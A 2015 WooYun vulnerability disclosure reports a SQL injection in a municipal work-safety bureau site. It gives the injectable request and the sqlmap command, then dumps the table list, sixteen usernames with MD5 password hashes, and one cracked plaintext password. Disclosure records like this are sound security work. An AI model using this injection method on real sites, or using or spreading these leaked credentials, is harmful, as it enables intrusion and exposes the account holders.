当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137732

漏洞标题:某市安全生产监督管理局存在SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: qglfnt

提交时间:2015-09-02 20:08

修复时间:2015-10-20 08:40

公开时间:2015-10-20 08:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-02: 细节已通知厂商并且等待厂商处理中
2015-09-05: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-15: 细节向核心白帽子及相关领域专家公开
2015-09-25: 细节向普通白帽子公开
2015-10-05: 细节向实习白帽子公开
2015-10-20: 细节向公众公开

简要描述:

RT

详细说明:

注入数据包 sqlmap -r 1.txt

GET http://**.**.**.**/count.php?aid=1&v=2 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/bencandy.php?fid=24&id=411
Cookie: safedog-flow-item=C0519CA4971AEC40DBE3AD4F6135C8EA; USR=p9qlbuap%090%091440774349%09http%3A%2F%2F**.**.**.**%2Fbencandy.php%3Ffid%3D24%26id%3D411
Connection: keep-alive

漏洞证明:

数据库

20150829000215.png


表段

Database: kmsafety                                                             
[76 tables]
+------------------------+
| qb_ad_compete_place    |
| qb_ad_compete_user     |
| qb_ad_config           |
| qb_ad_norm_place       |
| qb_ad_norm_user        |
| qb_admin_menu          |
| qb_alonepage           |
| qb_area                |
| qb_article             |
| qb_article_content_100 |
| qb_article_content_101 |
| qb_article_content_107 |
| qb_article_db          |
| qb_article_module      |
| qb_channel             |
| qb_collection          |
| qb_comment             |
| qb_config              |
| qb_copyfrom            |
| qb_count               |
| qb_crontab             |
| qb_form_config         |
| qb_form_content        |
| qb_form_content_1      |
| qb_form_content_2      |
| qb_form_content_3      |
| qb_form_content_4      |
| qb_form_content_5      |
| qb_form_content_6      |
| qb_form_content_7      |
| qb_form_content_8      |
| qb_form_module         |
| qb_form_reply          |
| qb_friendlink          |
| qb_friendlink_sort     |
| qb_fu_article          |
| qb_fu_sort             |
| qb_gather_rule         |
| qb_gather_sort         |
| qb_group               |
| qb_guestbook_config    |
| qb_guestbook_content   |
| qb_guestbook_sort      |
| qb_hack                |
| qb_jfabout             |
| qb_jfsort              |
| qb_keyword             |
| qb_keywordid           |
| qb_label               |
| qb_limitword           |
| qb_memberdata          |
| qb_members             |
| qb_menu                |
| qb_module              |
| qb_moneycard           |
| qb_moneylog            |
| qb_olpay               |
| qb_pm                  |
| qb_propagandize        |
| qb_regnum              |
| qb_reply               |
| qb_report              |
| qb_shoporderproduct    |
| qb_shoporderuser       |
| qb_sort                |
| qb_special             |
| qb_special_comment     |
| qb_spsort              |
| qb_template            |
| qb_template_bak        |
| qb_upfile              |
| qb_vote_comment        |
| qb_vote_config         |
| qb_vote_element        |
| qb_vote_topic          |
| qb_yzimg               |
+------------------------+


字段

Database: kmsafety                                                             
Table: qb_members
[3 columns]
+----------+-----------------------+
| Column   | Type                  |
+----------+-----------------------+
| password | varchar(32)           |
| uid      | mediumint(7) unsigned |
| username | varchar(30)           |
+----------+-----------------------+


字段内容(帐号信息)

Database: kmsafety
Table: qb_members
[16 entries]
+-----+-------------+----------------------------------+
| uid | username    | password                         |
+-----+-------------+----------------------------------+
| 1   | admin       | b8429f230195926887f39d96abe5cdec |
| 2   | test        | 1bf3bdadeaa8ef65abffc83c6b4ebf7a |
| 3   | zhoutiao    | 5c0d033b5455b89950a10b502a25199f |
| 4   | zrl123      | fc5b0146d4e5713cd82c2c64ba03b850 |
| 5   | zhengxiang  | ad83aed946189b9af06939962bd432b3 |
| 6   | yangwenqian | b8429f230195926887f39d96abe5cdec |
| 7   | ywq         | c04d550d456230e3f26cccbccfa7f084 |
| 8   | fmc         | a069623fbad30b03eb8970cd7ca15ca7 |
| 9   | whc         | 7a70dfcf15d4d8329a63c86c94a46289 |
| 10  | hgc         | b5122c946cd0d3e0543beb007d854cb1 |
| 11  | zjc         | 87a27359cb2bdb7d4f6001570ff5268a |
| 12  | fgc         | c4ca4238a0b923820dcc509a6f75849b |
| 13  | yjb         | c33367701511b4f6020ec61ded352059 |
| 14  | jczd        | 88cb6a0e468edc75b0432d580501c9a4 |
| 15  | dzz         | 62026aaed5419a1ceaa229bf6886443e |
| 16  | bgsgly      | ee1757e2f9c492197dff67860a9940e4 |
+-----+-------------+----------------------------------+


破解出其中一帐号密码
zhoutiao/zhoutiao123

修复方案:

过滤参数

版权声明:转载请注明来源 qglfnt@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-05 08:38

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置。

最新状态:

暂无